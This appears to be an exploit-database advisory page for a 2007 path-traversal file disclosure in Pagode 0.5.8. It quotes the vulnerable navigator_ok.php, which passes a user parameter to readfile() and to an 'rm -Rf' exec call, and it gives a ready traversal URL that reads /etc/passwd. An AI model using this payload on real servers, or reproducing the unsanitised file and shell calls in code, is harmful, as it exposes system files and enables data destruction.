header-logo
Suggest Exploit
vendor:
Pagode
by:
GolD_M = [Mahmood_ali]
7.5
CVSS
HIGH
Remote File Disclosure
CWE
Product Name: Pagode
Affected Version From: 2000.5.8
Affected Version To: 2000.5.8
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Pagode 0.5.8 Remote File Disclosure

The vulnerability allows an attacker to disclose files on the server by exploiting the 'navigator_ok.php' script in Pagode 0.5.8. By providing a specially crafted 'asolute' parameter in the URL, an attacker can read arbitrary files on the server, such as the '/etc/passwd' file.

Mitigation:

Update to a patched version of Pagode or apply appropriate security measures to prevent unauthorized access to sensitive files.
Source

Exploit-DB raw data:

# Pagode 0.5.8(navigator_ok.php asolute)Remote File Disclosure
# D.Script:http://belnet.dl.sourceforge.net/sourceforge/pagode/pagode-0.5.8.tar.gz
# Discovered by: GolD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# V.Code In /navigator/navigator_ok.php: 
###################/navigator/navigator_ok.php###################
#  <?
#  	session_cache_limiter('none');
#	session_start();
#	include ('../includes/functions.php');
#
#	header("Content-Type: application/save-as");
#	header("Content-Length: $file_size");
#	header("Content-Disposition: attachment; filename=$file_name");
#	header("Content-Transfer-Encoding: binary");
#	readfile($asolute); <----[+]
#	exec("rm -Rf $asolute");
#  ?>
#################################################################
# Exploit:[Path_Pagode]/navigator/navigator_ok.php?asolute=../../../../../../etc/passwd
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group & 020

# milw0rm.com [2007-04-23]